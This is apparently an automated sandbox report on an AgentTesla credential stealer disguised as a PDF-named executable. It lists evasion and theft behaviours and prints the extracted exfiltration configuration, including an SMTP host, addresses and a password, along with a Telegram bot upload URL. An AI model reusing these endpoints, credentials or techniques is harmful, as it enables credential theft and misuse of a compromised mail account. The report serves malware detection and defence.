Loading ...

Play interactive tourEdit tour

Analysis Report Arrivalnotice2020pdf.exe

Overview

General Information

Sample Name:Arrivalnotice2020pdf.exe
Analysis ID:323773
MD5:ed6f9a5ace6367f4e532dd4ec40762ac
SHA1:5ed4fd1e8a4e7dbed31928c2b7dd2ca1043cb68e
SHA256:df107977e92465958c206bf42e33ce394e8573da3c4035b69bfa0d0eaf367914
Tags:AgentTeslaexe

Most interesting Screenshot:

Detection

AgentTesla
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Multi AV Scanner detection for submitted file
Sigma detected: MSBuild connects to smtp port
Yara detected AgentTesla
.NET source code contains very large array initializations
Found evasive API chain (trying to detect sleep duration tampering with parallel thread)
Initial sample is a PE file and has a suspicious name
Installs a global keyboard hook
Machine Learning detection for sample
Maps a DLL or memory area into another process
May check the online IP address of the machine
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Antivirus or Machine Learning detection for unpacked file
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a window with clipboard capturing capabilities
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to load missing DLLs
Uses SMTP (mail sending)
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer

Classification

Startup

  • System is w10x64
  • Arrivalnotice2020pdf.exe (PID: 5492 cmdline: 'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe' MD5: ED6F9A5ACE6367F4E532DD4EC40762AC)
    • conhost.exe (PID: 1304 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • MSBuild.exe (PID: 2540 cmdline: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe MD5: 88BBB7610152B48C2B3879473B17857E)
  • cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "zSmwx", "URL: ": "https://dBHeYNWtul3f.net", "To: ": "akannwater@gmail.com", "ByHost: ": "webmail.hapkidocollege.com.au:587", "Password: ": "pXS5n2E1Xj", "From: ": "train@hapkidocollege.com.au"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
    00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmpJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
      00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
        Process Memory Space: Arrivalnotice2020pdf.exe PID: 5492JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
          Process Memory Space: MSBuild.exe PID: 2540JoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
            Click to see the 1 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            3.2.MSBuild.exe.400000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security
              0.2.Arrivalnotice2020pdf.exe.b0000.0.unpackJoeSecurity_AgentTesla_1Yara detected AgentTeslaJoe Security

                Sigma Overview

                System Summary:

                barindex
                Sigma detected: MSBuild connects to smtp portShow sources
                Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 103.9.171.52, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe, Initiated: true, ProcessId: 2540, Protocol: tcp, SourceIp: 192.168.2.3, SourceIsIpv6: false, SourcePort: 49719

                Signature Overview

                Click to jump to signature section

                Show All Signature Results

                AV Detection:

                barindex
                Found malware configurationShow sources
                Source: MSBuild.exe.2540.3.memstrMalware Configuration Extractor: Agenttesla {"Username: ": "zSmwx", "URL: ": "https://dBHeYNWtul3f.net", "To: ": "akannwater@gmail.com", "ByHost: ": "webmail.hapkidocollege.com.au:587", "Password: ": "pXS5n2E1Xj", "From: ": "train@hapkidocollege.com.au"}
                Multi AV Scanner detection for submitted fileShow sources
                Source: Arrivalnotice2020pdf.exeVirustotal: Detection: 22%Perma Link
                Machine Learning detection for sampleShow sources
                Source: Arrivalnotice2020pdf.exeJoe Sandbox ML: detected
                Source: 3.2.MSBuild.exe.400000.0.unpackAvira: Label: TR/Spy.Gen8

                Networking:

                barindex
                May check the online IP address of the machineShow sources
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: unknownDNS query: name: api.ipify.org
                Source: global trafficTCP traffic: 192.168.2.3:49719 -> 103.9.171.52:587
                Source: Joe Sandbox ViewIP Address: 174.129.214.20 174.129.214.20
                Source: Joe Sandbox ViewIP Address: 174.129.214.20 174.129.214.20
                Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
                Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                Source: global trafficTCP traffic: 192.168.2.3:49719 -> 103.9.171.52:587
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownTCP traffic detected without corresponding DNS query: 92.122.145.220
                Source: unknownDNS traffic detected: queries for: webmail.hapkidocollege.com.au
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: http://127.0.0.1:HTTP/1.1
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: http://DynDns.comDynDNS
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: http://ZLVZGU.com
                Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
                Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
                Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.comodoca.com0
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.org/(
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgGETMozilla/5.0
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.ipify.orgx&
                Source: Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmp, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
                Source: MSBuild.exe, 00000003.00000002.479039341.000000000364E000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.479119119.0000000003668000.00000004.00000001.sdmp, MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://dBHeYNWtul3f.net
                Source: MSBuild.exe, 00000003.00000003.409109256.000000000791A000.00000004.00000001.sdmpString found in binary or memory: https://secure.comodo.com/CPS0
                Source: Arrivalnotice2020pdf.exe, MSBuild.exe, 00000003.00000002.474831985.0000000000402000.00000040.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
                Source: MSBuild.exe, 00000003.00000002.477291193.0000000003401000.00000004.00000001.sdmpString found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha
                Source: unknownNetwork traffic detected: HTTP traffic on port 49698 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49678
                Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49699
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49697
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49696
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49683
                Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49697 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49696 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49693 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49692 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49680
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49690
                Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49683 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49690 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49701 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49687 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49701

                Key, Mouse, Clipboard, Microphone and Screen Capturing:

                barindex
                Installs a global keyboard hookShow sources
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWindow created: window name: CLIPBRDWNDCLASS

                System Summary:

                barindex
                .NET source code contains very large array initializationsShow sources
                Source: 3.2.MSBuild.exe.400000.0.unpack, u003cPrivateImplementationDetailsu003eu007b4A8BF70Cu002d7F0Au002d482Au002dA4C2u002dD390DFF70F9Fu007d/u003969E92F2u002d42FDu002d4329u002d80A2u002d2D59A2934EA4.csLarge array initialization: .cctor: array initializer size 12028
                Initial sample is a PE file and has a suspicious nameShow sources
                Source: initial sampleStatic PE information: Filename: Arrivalnotice2020pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0168B0BA NtQuerySystemInformation,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0168B089 NtQuerySystemInformation,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C583D
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C6835
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C50C1
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D80D5
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BA194
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B8273
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C4B51
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B8B7F
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BE3A9
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B93E9
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C45E1
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B7F50
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B8767
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B8FB4
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_055892E8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB4ED0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB2EE8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB7AE0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB6EB8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB0070
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB2E89
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADB6EA8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADED9D0
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADEAEB8
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADEBDAC
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADED578
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADE0070
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADE5930
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0ADE0007
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: String function: 000BAF40 appears 39 times
                Source: Arrivalnotice2020pdf.exeBinary or memory string: OriginalFilename vs Arrivalnotice2020pdf.exe
                Source: Arrivalnotice2020pdf.exe, 00000000.00000002.211934436.00000000000D3000.00000004.00020000.sdmpBinary or memory string: OriginalFilenamefobWaEQAeVYNzsIgHQxKLyzadmXNXRmrUHO.exe4 vs Arrivalnotice2020pdf.exe
                Source: Arrivalnotice2020pdf.exe, 00000000.00000003.210597797.0000000002FB6000.00000004.00000001.sdmpBinary or memory string: OriginalFilenamentdll.dllj% vs Arrivalnotice2020pdf.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: security.dll
                Source: 3.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: 3.2.MSBuild.exe.400000.0.unpack, A/b2.csCryptographic APIs: 'TransformFinalBlock', 'CreateDecryptor'
                Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@4/0@2/2
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0168AF3E AdjustTokenPrivileges,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeCode function: 3_2_0168AF07 AdjustTokenPrivileges,
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
                Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1304:120:WilError_01
                Source: Arrivalnotice2020pdf.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\9603718106bd57ecfbb18fefd769cab4\mscorlib.ni.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: Arrivalnotice2020pdf.exeVirustotal: Detection: 22%
                Source: unknownProcess created: C:\Users\user\Desktop\Arrivalnotice2020pdf.exe 'C:\Users\user\Desktop\Arrivalnotice2020pdf.exe'
                Source: unknownProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\mscorrc.dll
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9445_none_d08c58b4442ba54f\MSVCR80.dll
                Source: Arrivalnotice2020pdf.exeStatic PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                Source: Binary string: wntdll.pdbUGP source: Arrivalnotice2020pdf.exe, 00000000.00000003.210004019.0000000002FF0000.00000004.00000001.sdmp
                Source: Binary string: wntdll.pdb source: Arrivalnotice2020pdf.exe, 00000000.00000003.210004019.0000000002FF0000.00000004.00000001.sdmp
                Source: Binary string: mscorrc.pdb source: MSBuild.exe, 00000003.00000002.482322603.00000000075A0000.00000002.00000001.sdmp
                Source: Arrivalnotice2020pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
                Source: Arrivalnotice2020pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
                Source: Arrivalnotice2020pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
                Source: Arrivalnotice2020pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
                Source: Arrivalnotice2020pdf.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000C215C EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D0554 push eax; ret
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000D0608 push eax; ret
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000B5655 push ecx; ret
                Source: C:\Users\user\Desktop\Arrivalnotice2020pdf.exeCode function: 0_2_000BAF85 push ecx; ret
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeRegistry key monitored for changes: HKEY_CURRENT_USER_Classes
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
                Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exeProcess information set: NOOPENFILEERRORBOX
